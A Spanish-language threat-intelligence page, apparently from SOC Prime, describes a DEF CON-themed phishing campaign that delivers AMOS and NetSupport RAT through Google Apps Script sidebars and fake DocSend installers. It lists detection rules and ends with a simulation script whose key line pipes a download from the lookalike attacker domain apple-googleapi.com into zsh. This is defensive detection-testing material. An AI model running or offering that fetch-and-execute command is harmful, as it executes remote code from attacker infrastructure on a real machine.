SOC Prime Bias: High

21 Aug 2026 16:11 UTC

Phishing temático de DEF CON abusa de Google Apps Script para entrega de malware

Author Photo
SOC Prime Team linkedin icon Seguir
Phishing temático de DEF CON abusa de Google Apps Script para entrega de malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenaza están apuntando a los asistentes de conferencias de ciberseguridad a través de la ingeniería social en X, anteriormente Twitter, para distribuir malware usando Google Docs armados e instaladores fraudulentos de DocSend. La campaña entrega el infostealer AMOS a usuarios de macOS, mientras que las víctimas de Windows reciben una carga útil de múltiples etapas que involucra NetSupport RAT y un implante de billetera Ledger. El ataque abusa de las barras laterales de Google Apps Script y de las indicaciones estilo ClickFix para reducir la sospecha y desencadenar la ejecución de código malicioso.

Investigación

Los investigadores de Huntress interactuaron con el actor de amenaza haciéndose pasar por un ejecutivo de CoinDesk para observar toda la cadena de ataque. La investigación descubrió un proceso sofisticado de múltiples etapas que involucra Google Apps Script, instaladores falsos firmados con certificados robados y un proxy local que intercepta TLS en Windows. Los investigadores también identificaron una etapa secundaria que ejecuta JavaScript en memoria y despliega una autoridad certificadora fraudulenta.

Mitigación

Los usuarios deben tratar como sospechosas las solicitudes inesperadas de ejecutar comandos de terminal, eludir Gatekeeper o instalar actualizaciones manuales desde las barras laterales del documento. Las organizaciones deben monitorear la actividad inusual de Google Apps Script y el uso no autorizado de certificados de firma de código. Controles de punto final robustos y la verificación independiente de enlaces para compartir documentos pueden reducir aún más la exposición.

Respuesta

Si se detecta actividad maliciosa, el sistema afectado debe ser aislado inmediatamente para detener la exfiltración de datos o el movimiento lateral. Los respondedores deben preservar la evidencia forense y considerar reimaginar el dispositivo mientras tratan las credenciales locales y los datos de billeteras de criptomonedas como comprometidos. Las sesiones activas deben ser revocadas, las contraseñas restablecidas y todas las claves API o secretos almacenados en el sistema rotados.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Comandos y Control Sospechosos por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)

Equipo SOC Prime
21 Ago 2026

Intento Sospechoso de Ejecución de Curl [MacOS] (vía cmdline)

Equipo SOC Prime
20 Ago 2026

Posible Ejecución por Uso de Nombre Corto de Script (vía cmdline)

Equipo SOC Prime
20 Ago 2026

Llamar Métodos .NET Sospechosos desde Powershell (vía powershell)

Equipo SOC Prime
20 Ago 2026

IOCs (HashSha256) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware

Reglas de IA de SOC Prime
20 Ago 2026

IOCs (HashMd5) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware

Reglas de IA de SOC Prime
20 Ago 2026

IOCs (SourceIP) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware

Reglas de IA de SOC Prime
20 Ago 2026

IOCs (DestinationIP) para detectar: Phishing Post-DEF CON Utiliza Google Doc Apps Script para Entregar Malware

Reglas de IA de SOC Prime
20 Ago 2026

Detección de Implementación de DocSend y NetSupport RAT Troyanizados [Creación de Procesos de Windows]

Reglas de IA de SOC Prime
20 Ago 2026

Ejecución Potencial de Script Shell Malicioso en macOS [Creación de Procesos de Linux]

Reglas de IA de SOC Prime
20 Ago 2026

Detección de Comunicación Maliciosa y Entrega de Carga Útil [Conexión de Red de Windows]

Reglas de IA de SOC Prime
20 Ago 2026

Detectar Creación y Ejecución de Script PowerShell Malicioso [Powershell de Windows]

Reglas de IA de SOC Prime
20 Ago 2026

## Ejecución de Simulación

Requisito Previo: La Comprobación de Telemetría y Línea Base Pre-vuelo debe haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario planea obtener acceso inicial en una estación de trabajo macOS haciéndose pasar por un proceso legítimo de actualización de la API de Google. Utilizan una táctica de ingeniería social donde se instruye al usuario a ejecutar un comando en el Terminal. El comando utiliza curl para obtener una carga desde apple-googleapi.com (un dominio tipográfico/parecido) y canaliza la salida directamente a zsh. Este enfoque de «vivir de la tierra» intenta minimizar el rastro forense en el sistema de archivos ejecutando el código directamente desde la transmisión de la red.

  • Script de Prueba de Regresión:

    #!/bin/bash
    # Script de simulación para activar la regla "Ejecución Potencial de Script Shell Malicioso".
    # Nota: Usamos una URL ficticia que imita la estructura del dominio para evitar llamadas externas reales si se desea, 
    # pero para que la regla se dispare, la línea de comando DEBE contener 'apple-googleapi.com'.
    
    echo "[*] Iniciando simulación: Imitando canalización de shell malicioso..."
    
    # Este comando satisface todas las condiciones: 
    # 1. El proceso es zsh/sh/bash 
    # 2. Contiene 'curl' 
    # 3. Contiene '| zsh' 
    # 4. Contiene 'apple-googleapi.com'
    
    # Usamos una URL inexistente para prevenir la ejecución real de la carga útil mientras sigue generando la telemetría.
    curl -s http://apple-googleapi.com/update.sh | zsh
    
    echo "[*] Comando de simulación enviado."
  • Comandos de Limpieza:

    # No se crean archivos en disco por el comando de ataque en sí mismo, 
    # pero si se generaron artefactos, deben eliminarse.
    rm -f ~/Downloads/update.sh 2>/dev/null
    echo "[*] Limpieza completa."